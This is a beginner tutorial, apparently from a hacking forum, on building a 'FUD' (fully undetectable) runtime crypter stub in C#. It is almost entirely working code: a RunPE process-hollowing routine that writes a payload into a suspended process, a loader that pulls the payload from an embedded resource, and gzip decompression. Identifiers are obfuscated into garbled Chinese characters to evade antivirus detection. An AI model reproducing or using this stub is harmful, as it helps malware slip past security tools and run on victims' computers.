How to make a FUD Runtime Stub (Level: Beginner) How to make a FUD Runtime Stub (Level: Beginner)
This Stub is for
https://leakforums.net/thread-468643
we need 3 class
class1
using System;
using System.Collections;
using System.Collections.Generic;
using System.Data;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Text;
public class çš„ä¼å¼å¹´è°¢è¾¾éžç”方外éžè‚‰éžè¾¾è¯´ç§è‡ªå¤©æ–‡æ–‡å
{
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool 英余å¼æ–‡ä¼ªç”(string 仿ä¼ä½™å¼æ–¹ä¸, StringBuilder 涯么伙信表文, IntPtr 谢份表åéžçš„, IntPtr 谢涯谢伙åŽè¾¾, [MarshalAs(UnmanagedType.Bool)]
bool inherit, int creation, IntPtr env, string 方丢伪达ç§ç§, byte[] ä¿¡ä¼è°¢æ¶¯ååŽ, IntPtr[] 么问ç§è¾¾ä¿¡å¤©);
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool V9(IntPtr hThr, uint[] ctxt);
[DllImport("ntdll")]
private static extern uint 英余å¼æ–‡ä¼ªç”0(IntPtr hProc, IntPtr baseAddr);
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool 英余å¼æ–‡ä¼ªç”1(IntPtr hProc, IntPtr baseAddr, ref IntPtr bufr, int bufrSize, ref IntPtr numRead);
[DllImport("kernel32.dll")]
private static extern uint 英余å¼æ–‡ä¼ªç”2(IntPtr hThread);
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool 英余å¼æ–‡ä¼ªç”3(IntPtr hThr, uint[] ctxt);
[DllImport("kernel32")]
private static extern IntPtr 英余å¼æ–‡ä¼ªç”4(IntPtr hProc, IntPtr addr, IntPtr size, int allocType, int prot);
[DllImport("kernel32", CharSet = CharSet.Auto, SetLastError = true)]
private static extern bool 英余å¼æ–‡ä¼ªç”5(IntPtr hProcess, IntPtr guyfjhkKJLHKLK, IntPtr dwSize, uint flNewProtect, ref uint lpflOldProtect);
[DllImport("kernel32.dll", SetLastError = true)]
private static extern bool 英余å¼æ–‡ä¼ªç”6(IntPtr hProcess, IntPtr 仿ä¼ä½™å¼æ–¹ä¸1, byte[] lpBuffer, uint nSize, int 仿ä¼ä½™å¼æ–¹ä¸2);
public static bool 肉方表文文ä¼ä¼™æ–‡ä½™æ–‡è‹±ä»¿å¸¸ä»·ä»¿(byte[] bytes, string surrogateProcess)
{
try
{
IntPtr 谢份表åéžçš„ = IntPtr.Zero;
IntPtr[] 英余å¼æ–‡ä¼ªç”7 = new IntPtr[4];
byte[] 英余å¼æ–‡ä¼ªç”8 = new byte[68];
int num2 = BitConverter.ToInt32(bytes, 60);
int num = BitConverter.ToInt16(bytes, num2 + 6);
IntPtr ptr4 = new IntPtr(BitConverter.ToInt32(bytes, num2 + 0x54));
if (英余å¼æ–‡ä¼ªç”(null, new StringBuilder(surrogateProcess), 谢份表åéžçš„, 谢份表åéžçš„, false, 4, 谢份表åéžçš„, null, 英余å¼æ–‡ä¼ªç”8, 英余å¼æ–‡ä¼ªç”7))
{
uint[] ctxt = new uint[179];
ctxt[0] = 0x10002;
if (V9(英余å¼æ–‡ä¼ªç”7[1], ctxt))
{
IntPtr baseAddr = new IntPtr(ctxt[0x29] + 8L);
IntPtr 英余å¼æ–‡ä¼ªç”9 = IntPtr.Zero;
IntPtr 仿ä¼ä½™å¼æ–¹ä¸0 = new IntPtr(4);
IntPtr numRead = IntPtr.Zero;
if (英余å¼æ–‡ä¼ªç”1(英余å¼æ–‡ä¼ªç”7[0], baseAddr, ref 英余å¼æ–‡ä¼ªç”9, Convert.ToInt32(仿ä¼ä½™å¼æ–¹ä¸0), ref numRead) && (英余å¼æ–‡ä¼ªç”0(英余å¼æ–‡ä¼ªç”7[0], 英余å¼æ–‡ä¼ªç”9) == 0))
{
IntPtr addr = new IntPtr(BitConverter.ToInt32(bytes, num2 + 0x34));
IntPtr size = new IntPtr(BitConverter.ToInt32(bytes, num2 + 80));
IntPtr 仿ä¼ä½™å¼æ–¹ä¸1 = 英余å¼æ–‡ä¼ªç”4(英余å¼æ–‡ä¼ªç”7[0], addr, size, 0x3000, 0x40);
int 仿ä¼ä½™å¼æ–¹ä¸2 = 0;
英余å¼æ–‡ä¼ªç”6(英余å¼æ–‡ä¼ªç”7[0], 仿ä¼ä½™å¼æ–¹ä¸1, bytes, Convert.ToUInt32(Convert.ToInt32(ptr4)), 仿ä¼ä½™å¼æ–¹ä¸2);
int num5 = num - 1;
for (int i = 0; i <= num5; i++)
{
int[] dst = new int[10];
Buffer.BlockCopy(bytes, (num2 + 0xf8) + (i * 40), dst, 0, 40);
byte[] buffer2 = new byte[(dst[4] - 1) + 1];
Buffer.BlockCopy(bytes, dst[5], buffer2, 0, buffer2.Length);
size = new IntPtr(仿ä¼ä½™å¼æ–¹ä¸1.ToInt32() + dst[3]);
addr = new IntPtr(buffer2.Length);
英余å¼æ–‡ä¼ªç”6(英余å¼æ–‡ä¼ªç”7[0], size, buffer2, Convert.ToUInt32(addr), 仿ä¼ä½™å¼æ–¹ä¸2);
}
size = new IntPtr(ctxt[0x29] + 8L);
addr = new IntPtr(4);
英余å¼æ–‡ä¼ªç”6(英余å¼æ–‡ä¼ªç”7[0], size, BitConverter.GetBytes(仿ä¼ä½™å¼æ–¹ä¸1.ToInt32()), Convert.ToUInt32(addr), 仿ä¼ä½™å¼æ–¹ä¸2);
ctxt[0x2c] = Convert.ToUInt32(仿ä¼ä½™å¼æ–¹ä¸1.ToInt32() + BitConverter.ToInt32(bytes, num2 + 40));
英余å¼æ–‡ä¼ªç”3(英余å¼æ–‡ä¼ªç”7[1], ctxt);
}
}
英余å¼æ–‡ä¼ªç”2(英余å¼æ–‡ä¼ªç”7[1]);
}
}
catch
{
return false;
}
return true;
}
}
class2
using System;
using System.Collections;
using System.Collections.Generic;
using System.Data;
using System.Diagnostics;
using System.Runtime.InteropServices;
static class æ–¹åŽè¾¾ä¹ˆé—®ä¸¢å…ˆé—®çš„ä»·é—®
{
[DllImport("kernel32.dll", SetLastError = true)]
private static extern IntPtr FindResource(IntPtr 谢谢天自éžå¸¸æ–‡ç§ä¼ æ–‡ä¼ æ€Žä¼ éžä»¿, string 伟怎余方éžä¼ç§å¸¸ç”常谢自伟怎余方éž, string ç§å¸¸ç”常谢自伟怎余方éžä¼Ÿæ€Žä½™æ–¹éžä¼ä¼Ÿæ€Žä½™æ–¹éžä¼);
[DllImport("kernel32", EntryPoint = "GetModuleHandleA", CharSet = CharSet.Ansi, SetLastError = true, ExactSpelling = true)]
private static extern IntPtr 达表ç”伪的天é“英文天方ç§è¡¨è¾¾ä»½(string moduleName);
[DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true, ExactSpelling = true)]
private static extern int SizeofResource(IntPtr 谢谢天自éžå¸¸æ–‡ç§ä¼ æ–‡ä¼ æ€Žä¼ éžä»¿, IntPtr hResInfo);
[DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true, ExactSpelling = true)]
private static extern IntPtr LoadResource(IntPtr 谢谢天自éžå¸¸æ–‡ç§ä¼ æ–‡ä¼ æ€Žä¼ éžä»¿, IntPtr hResInfo);
public static byte[] æ–‡çš„ä»·ä¼ å…ˆæ–¹å»¶ä¿¡çš„æ–¹ä¹ˆ(string 谢表的书ä¼è¯´ä¿¡ä½™ç”¨éžä½™ä½™å¤–自频)
{
IntPtr 谢谢天自éžå¸¸æ–‡ç§ä¼ æ–‡ä¼ æ€Žä¼ éžä»¿ = 达表ç”伪的天é“英文天方ç§è¡¨è¾¾ä»½(谢表的书ä¼è¯´ä¿¡ä½™ç”¨éžä½™ä½™å¤–自频);
IntPtr ç”外信伟表余åŽé“价达英 = FindResource(谢谢天自éžå¸¸æ–‡ç§ä¼ æ–‡ä¼ æ€Žä¼ éžä»¿, "Sweden", "Nykoping");
IntPtr ä¼ä¹ˆå…ˆç§è°¢ä»¿å¼è°¢å¤–ä¿¡ = LoadResource(谢谢天自éžå¸¸æ–‡ç§ä¼ æ–‡ä¼ æ€Žä¼ éžä»¿, ç”外信伟表余åŽé“价达英);
dynamic 说éžå…ˆå么谢余谢书仿涯伪ç§çš„éžæ–‡å¤–仿éžè‡ª = SizeofResource(谢谢天自éžå¸¸æ–‡ç§ä¼ æ–‡ä¼ æ€Žä¼ éžä»¿, ç”外信伟表余åŽé“价达英);
byte[] 英余延ç§ä¸å¼è¡¨ä¸ä»¿ = new byte[说éžå…ˆå么谢余谢书仿涯伪ç§çš„éžæ–‡å¤–仿éžè‡ª];
Marshal.Copy(ä¼ä¹ˆå…ˆç§è°¢ä»¿å¼è°¢å¤–ä¿¡, 英余延ç§ä¸å¼è¡¨ä¸ä»¿, 0, Convert.ToInt32(说éžå…ˆå么谢余谢书仿涯伪ç§çš„éžæ–‡å¤–仿éžè‡ª));
return 英余延ç§ä¸å¼è¡¨ä¸ä»¿;
}
}
class3
using System;
using System.Collections;
using System.Collections.Generic;
using System.Data;
using System.Diagnostics;
using System.IO.Compression;
using System.IO;
public class Compression
{
public static byte[] Compress(byte[] bytData)
{
using (MemoryStream oMS = new MemoryStream())
{
//GZip object that compress the file
using (GZipStream oGZipStream = new GZipStream(oMS, CompressionMode.Compress))
{
//Write to the Stream object from the buffer
oGZipStream.Write(bytData, 0, bytData.Length);
oGZipStream.Close();
bytData = new byte[oMS.ToArray().Length];
bytData = oMS.ToArray();
}
oMS.Close();
}
return bytData;
}
public static byte[] Decompress(byte[] bytData)
{
using (MemoryStream oMS = new MemoryStream(bytData))
{
using (GZipStream oGZipStream = new GZipStream(oMS, CompressionMode.Decompress))
{
const int CHUNK = 1024;
int intTotalBytesRead = 0;
do
{
// Enlarge the buffer.
Array.Resize(ref bytData, intTotalBytesRead + CHUNK);
// Read the next chunk.
int intBytesRead = oGZipStream.Read(bytData, intTotalBytesRead, CHUNK);
intTotalBytesRead += intBytesRead;
// See if we're done.
if (intBytesRead < CHUNK)
{
// We're done. Make the buffer fit the data.
Array.Resize(ref bytData, intTotalBytesRead);
break; // TODO: might not be correct. Was : Exit Do
}
} while (true);
oGZipStream.Close();
}
oMS.Close();
}
return bytData;
}
}
Program
byte[] dbytes = null;
Hej = æ–¹åŽè¾¾ä¹ˆé—®ä¸¢å…ˆé—®çš„ä»·é—®.æ–‡çš„ä»·ä¼ å…ˆæ–¹å»¶ä¿¡çš„æ–¹ä¹ˆ(Application.ExecutablePath);
dbytes = Compression.Decompress(Hej);
çš„ä¼å¼å¹´è°¢è¾¾éžç”方外éžè‚‰éžè¾¾è¯´ç§è‡ªå¤©æ–‡æ–‡å.肉方表文文ä¼ä¼™æ–‡ä½™æ–‡è‹±ä»¿å¸¸ä»·ä»¿(dbytes, Application.ExecutablePath);